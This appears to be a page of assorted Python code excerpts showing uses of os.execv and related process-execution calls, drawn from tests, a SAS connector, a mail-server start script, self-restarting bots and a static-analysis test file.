	os.system('setterm -cursor off')
	while store.is_action_running():
		ini=banner[0:numchar]
		end=banner[numchar:inc]
		text=ini+' '+end
		print(text+'                 ',end='\r')
		numchar-=1
		inc+=1
		time.sleep(0.2)
		if numchar<0:
			numchar=len(banner)
			inc=0
	print("")
	print (CURSOR_UP + ERASE_LINE)
	for key in actionList:
		progressDic=store.get_progress(key)
		if key in progressDic:
				if progressDic[key]==100 and not actionList[key]:
					actionList[key]=print_results(key)
	print_results()
	os.system('setterm -cursor on')
Exemple #51
0
 def test_execv_no_args():
     with raises(ValueError):
         os.execv("notepad", [])
     # PyPy needs at least one arg, CPython 2.7 is fine without
     with raises(ValueError):
         os.execve("notepad", [], {})
Exemple #52
0
 def test_execv_raising2():
     for n in 3, [3, "a"]:
         with raises(TypeError):
             os.execv("xxx", n)
Exemple #53
0
 def restart(self):
     logger.info("Restarting the market maker...")
     os.execv(sys.executable, [sys.executable] + sys.argv)
Exemple #54
0
 def test_execv_raising():
     with raises(OSError):
         os.execv("saddsadsadsadsa", ["saddsadsasaddsa"])
Exemple #55
0
os.environ["HOST_LMTP"] = os.environ.get("HOST_LMTP", "imap:2525")

for postfix_file in glob.glob("/conf/*.cf"):
    convert(postfix_file,
            os.path.join("/etc/postfix", os.path.basename(postfix_file)))

if os.path.exists("/overrides/postfix.cf"):
    for line in open("/overrides/postfix.cf").read().strip().split("\n"):
        os.system('postconf -e "{}"'.format(line))

if os.path.exists("/overrides/postfix.master"):
    for line in open("/overrides/postfix.master").read().strip().split("\n"):
        os.system('postconf -Me "{}"'.format(line))

for map_file in glob.glob("/overrides/*.map"):
    destination = os.path.join("/etc/postfix", os.path.basename(map_file))
    shutil.copyfile(map_file, destination)
    os.system("postmap {}".format(destination))
    os.remove(destination)

convert("/conf/rsyslog.conf", "/etc/rsyslog.conf")

# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
if os.path.exists("/var/run/rsyslogd.pid"):
    os.remove("/var/run/rsyslogd.pid")
os.system(
    "/usr/lib/postfix/post-install meta_directory=/etc/postfix create-missing")
os.system("/usr/lib/postfix/master &")
os.execv("/usr/sbin/rsyslogd", ["rsyslogd", "-n"])
Exemple #56
0
# To keep the exec calls below from actually running, without being so clever
# in our analysis that it discards that code as dead, I used `if UNKNOWN` instead
#
# below, `path` is a relative/absolute path; for the `p` variants this could also be
# the name of an executable, which will be looked up in the PATH environment variable,
# which we call `file` to highlight this difference.
#
# These are also modeled as FileSystemAccess, although they are not super relevant for
# the path-injection query -- a user being able to control which program is executed
# doesn't sound safe even if that is restricted to be within a certain directory.
if UNKNOWN:
    env = {"FOO": "foo"}
    os.execl("path", "<progname>", "arg0")  # $ getCommand="path" getAPathArgument="path"
    os.execle("path", "<progname>", "arg0", env)  # $ getCommand="path" getAPathArgument="path"
    os.execlp("file", "<progname>", "arg0")  # $ getCommand="file" getAPathArgument="file"
    os.execlpe("file", "<progname>", "arg0", env)  # $ getCommand="file" getAPathArgument="file"
    os.execv("path", ["<progname>", "arg0"])  # $ getCommand="path" getAPathArgument="path"
    os.execve("path", ["<progname>", "arg0"], env)  # $ getCommand="path" getAPathArgument="path"
    os.execvp("file", ["<progname>", "arg0"])  # $ getCommand="file" getAPathArgument="file"
    os.execvpe("file", ["<progname>", "arg0"], env)  # $ getCommand="file" getAPathArgument="file"


########################################
# https://docs.python.org/3.8/library/os.html#os.spawnl
env = {"FOO": "foo"}
os.spawnl(os.P_WAIT, "path", "<progname>", "arg0")  # $ getCommand="path" getAPathArgument="path"
os.spawnle(os.P_WAIT, "path", "<progname>", "arg0", env)  # $ getCommand="path" getAPathArgument="path"
os.spawnlp(os.P_WAIT, "file", "<progname>", "arg0")  # $ getCommand="file" getAPathArgument="file"
os.spawnlpe(os.P_WAIT, "file", "<progname>", "arg0", env)  # $ getCommand="file" getAPathArgument="file"
os.spawnv(os.P_WAIT, "path", ["<progname>", "arg0"])  # $ getCommand="path" getAPathArgument="path"
os.spawnve(os.P_WAIT, "path", ["<progname>", "arg0"], env)  # $ getCommand="path" getAPathArgument="path"
os.spawnvp(os.P_WAIT, "file", ["<progname>", "arg0"])  # $ getCommand="file" getAPathArgument="file"
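# A small illustration of the path/file distinction drawn in the comments above
# (assuming /bin/ls exists): the plain variants need a concrete path, while the
# *p variants resolve a bare name through the PATH environment variable.
import os

def exec_ls_by_path():
    os.execv("/bin/ls", ["ls", "-l"])   # exact path, no PATH lookup

def exec_ls_by_name():
    os.execvp("ls", ["ls", "-l"])       # "ls" is looked up in PATH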
   def _startsas(self):
      if self.pid:
         return self.pid

      # check for local iom server
      if len(self.sascfg.iomhost) > 0:
         zero = False
      else:
         zero = True

      port = 0
      try:
         self.sockin  = socks.socket()
         self.sockin.bind(("",port))
         #self.sockin.bind(("",32701))

         self.sockout = socks.socket()
         self.sockout.bind(("",port))
         #self.sockout.bind(("",32702))

         self.sockerr = socks.socket()
         self.sockerr.bind(("",port))
         #self.sockerr.bind(("",32703))
      except OSError:
         print('Error trying to open a socket in the _startsas method. Call failed.')
         return None
      self.sockin.listen(0)
      self.sockout.listen(0)
      self.sockerr.listen(0)

      if not zero:
         if self.sascfg.output.lower() == 'html':
            print("""HTML4 is only valid in 'local' mode (SAS_output_options in sascfg.py).
Please see SAS_config_names templates 'default' (STDIO) or 'winlocal' (IOM) in the default sascfg.py.
Will use HTML5 for this SASsession.""")
            self.sascfg.output = 'html5'

         user  = self.sascfg.omruser
         pw    = self.sascfg.omrpw
         found = False
         if self.sascfg.authkey:
            if os.name == 'nt': 
               pwf = os.path.expanduser('~')+os.sep+'_authinfo'
            else:
               pwf = os.path.expanduser('~')+os.sep+'.authinfo'
            try:
               fid = open(pwf, mode='r')
               for line in fid:
                  if line.startswith(self.sascfg.authkey): 
                     user = line.partition('user')[2].lstrip().partition(' ')[0].partition('\n')[0]
                     pw   = line.partition('password')[2].lstrip().partition(' ')[0].partition('\n')[0]
                     found = True
               fid.close()
            except OSError as e:
               print('Error trying to read authinfo file:'+pwf+'\n'+str(e))
               pass
            except:
               pass

            if not found:
               print('Did not find key '+self.sascfg.authkey+' in authinfo file:'+pwf+'\n')

         while len(user) == 0:
            user = self.sascfg._prompt("Please enter the IOM user id: ")

      pgm    = self.sascfg.java
      parms  = [pgm]
      parms += ["-classpath",  self.sascfg.classpath, "pyiom.saspy2j"]
      #parms += ["-classpath", self.sascfg.classpath+":/u/sastpw/tkpy2j", "pyiom.saspy2j_sleep", "-host", "tomspc.na.sas.com"]
      parms += ["-host", "localhost"] 
      parms += ["-stdinport",  str(self.sockin.getsockname()[1])]
      parms += ["-stdoutport", str(self.sockout.getsockname()[1])]
      parms += ["-stderrport", str(self.sockerr.getsockname()[1])]
      if self.sascfg.timeout is not None:
         parms += ["-timeout", str(self.sascfg.timeout)]
      if self.sascfg.appserver:
         parms += ["-appname", "'"+self.sascfg.appserver+"'"]
      if not zero:
         parms += ["-iomhost", self.sascfg.iomhost, "-iomport", str(self.sascfg.iomport)]     
         parms += ["-user", user]     
      else:
         parms += ["-zero"]     
      parms += ['']

      s = ''
      for i in range(len(parms)):
         if i == 2 and os.name == 'nt':
            s += '"'+parms[i]+'"'+' '
         else:
            s += parms[i]+' '

      if os.name == 'nt': 
         try:
            self.pid = subprocess.Popen(parms, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            pid = self.pid.pid
         except OSError as e:
            print("The OS Error was:\n"+e.strerror+'\n')
            print("SAS Connection failed. No connection established. Double check you settings in sascfg.py file.\n")  
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
            return None
      else:
         #signal.signal(signal.SIGCHLD, signal.SIG_IGN)

         PIPE_READ  = 0
         PIPE_WRITE = 1
         
         pin  = os.pipe() 
         pout = os.pipe()
         perr = os.pipe() 
      
         pidpty = os.forkpty()
         if pidpty[0]:
            # we are the parent
            self.pid = pidpty[0]
            pid = self.pid

            os.close(pin[PIPE_READ])
            os.close(pout[PIPE_WRITE]) 
            os.close(perr[PIPE_WRITE]) 

         else:
            # we are the child
            signal.signal(signal.SIGINT, signal.SIG_DFL)

            os.close(0)
            os.close(1)
            os.close(2)
          
            os.dup2(pin[PIPE_READ],   0)
            os.dup2(pout[PIPE_WRITE], 1)
            os.dup2(perr[PIPE_WRITE], 2)
          
            os.close(pin[PIPE_READ])
            os.close(pin[PIPE_WRITE])
            os.close(pout[PIPE_READ])
            os.close(pout[PIPE_WRITE]) 
            os.close(perr[PIPE_READ])
            os.close(perr[PIPE_WRITE]) 
          
            try:
               #sleep(5)
               os.execv(pgm, parms)
            except OSError as e:
               print("The OS Error was:\n"+e.strerror+'\n')
               print("SAS Connection failed. No connection established. Double check you settings in sascfg.py file.\n")  
               print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
               print("If no OS Error above, try running the following command (where saspy is running) manually to see what is wrong:\n"+s+"\n")
               os._exit(-6)

      if os.name == 'nt': 
         try:
            self.pid.wait(1)

            error  = self.pid.stderr.read(4096).decode()+'\n' 
            error += self.pid.stdout.read(4096).decode() 
            print("Java Error:\n"+error)

            print("Subprocess failed to start. Double check you settings in sascfg.py file.\n") 
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
            self.pid = None
            return None
         except:
            pass
      else:

         self.pid    = pidpty[0]
         self.stdin  = os.fdopen(pin[PIPE_WRITE], mode='wb')
         self.stderr = os.fdopen(perr[PIPE_READ], mode='rb')
         self.stdout = os.fdopen(pout[PIPE_READ], mode='rb')
   
         fcntl.fcntl(self.stdout, fcntl.F_SETFL, os.O_NONBLOCK)
         fcntl.fcntl(self.stderr, fcntl.F_SETFL, os.O_NONBLOCK)

         sleep(1)
         rc = os.waitpid(self.pid, os.WNOHANG)
         if rc[0] == 0:
            pass
         else:
            error  = self.stderr.read1(4096).decode()+'\n' 
            error += self.stdout.read1(4096).decode() 
            print("Java Error:\n"+error)
            print("SAS Connection failed. No connection established. Staus="+str(rc)+"  Double check you settings in sascfg.py file.\n")  
            print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
            print("If no Java Error above, try running the following command (where saspy is running) manually to see if it's a problem starting Java:\n"+s+"\n")
            self.pid = None
            return None

      self.stdin  = self.sockin.accept()
      self.stdout = self.sockout.accept()
      self.stderr = self.sockerr.accept()
      self.stdout[0].setblocking(False)
      self.stderr[0].setblocking(False)

      if not zero:
         while len(pw) == 0:
            pw = self.sascfg._prompt("Please enter the password for IOM user "+self.sascfg.omruser+": ", pw=True)
         pw += '\n'
         self.stdin[0].send(pw.encode())

      ll = self.submit("options svgtitle='svgtitle'; options validvarname=any pagesize=max nosyntaxcheck; ods graphics on;", "text")

      if self.pid is None:
         print(ll['LOG'])
         print("SAS Connection failed. No connection established. Double check you settings in sascfg.py file.\n")  
         print("Attempted to run program "+pgm+" with the following parameters:"+str(parms)+"\n")
         if zero:
            print("Be sure the path to sspiauth.dll is in your System PATH"+"\n")
         return None

      print("SAS Connection established. Subprocess id is "+str(pid)+"\n")  
      return self.pid
            for i in range(0, len(image_bytes), CHUNK_SIZE):
                chunked.append(
                    UploadImageRequest(
                        reconstruction_id=reconstruction_id,
                        image=ImageData(metadata=meta,
                                        data=image_bytes[i:i + CHUNK_SIZE])))
            client.UploadImage(iter(chunked))

    print(f"Requesting reconstruction of {reconstruction_id}")
    reconstruct_response = client.Reconstruct(
        ReconstructRequest(reconstruction_id=reconstruction_id))
    obj_meta = None
    if reconstruct_response.success:
        print("Getting reconstructed OBJ...")
        with open(f"{reconstruction_id}.obj", "wb+") as output_obj, \
            open("texture.tmp", "wb+") as output_texture, \
            open("mtl.tmp", "wb+") as output_mtl:
            for get_obj_response in client.GetOBJ(
                    GetOBJRequest(reconstruction_id=reconstruction_id)):
                obj_meta = get_obj_response.obj.metadata
                output_obj.write(get_obj_response.obj.obj_data)
                output_mtl.write(get_obj_response.obj.mtl_data)
                output_texture.write(get_obj_response.obj.texture_data)
            os.rename("texture.tmp", os.path.basename(obj_meta.texture_path))
            os.rename("mtl.tmp", os.path.basename(obj_meta.mtl_path))
            print(f"Wrote OBJ to {reconstruction_id}.obj")
        os.execv("/usr/bin/meshlab",
                 ['/usr/bin/meshlab', f"{reconstruction_id}.obj"])
    else:
        print("Reconstruction Failed")
Exemple #59
0
        print("更新に失敗しました")
        print("Update failed")
        print(f'{traceback.format_exc()}\n')
        return None


if "-dev" in sys.argv:
    githuburl = "https://raw.githubusercontent.com/gomashio1596/Fortnite-LobbyBot/Dev/"
else:
    githuburl = "https://raw.githubusercontent.com/gomashio1596/Fortnite-LobbyBot/master/"

if CheckUpdate("auto-updater.py", githuburl):
    print("auto-updater.pyの更新を確認しました。アップデーターをもう一度起動します...")
    print("auto-updater.py got updated. Run updater again...\n")
    os.chdir(os.getcwd())
    os.execv(os.sys.executable, ['python', *sys.argv])

flag = False
CheckUpdate("index.py", githuburl)
if CheckUpdate("requirements.txt", githuburl):
    print("requirements.txtの更新を確認しました。INSTALLを実行します")
    print("requirements.txt got updated. Run INSTALL\n")
    flag = True

CheckUpdate("config.json", githuburl)
CheckUpdate("commands.json", githuburl)
CheckUpdate("lang/en.json", githuburl)
CheckUpdate("lang/es.json", githuburl)
CheckUpdate("lang/ja.json", githuburl)
CheckUpdate("LICENSE", githuburl)
                db.insert(data)
                try:
                    r = requests.post(
                        'https://carbon-meter.herokuapp.com/kW-upload',
                        data={'kW': kW})
                    print(r.content)
                except:
                    print('kW upload failed')
                global tries
                tries = 0


# Start scanning
scanner = Scanner().withDelegate(ScanDelegate())
scanner.clear()
scanner.start()

tries = 0

# Keep scanning in 10-second chunks
while True:
    print('Scanning...')
    scanner.process(10)
    tries += 1
    # restart script if no data received after 5 loops
    if tries >= 5:
        print('Restarting')
        sys.stdout.flush()
        os.execv(sys.executable, ['python3'] + sys.argv)
# in case we wanted to finish, we should call 'stop'
scanner.stop()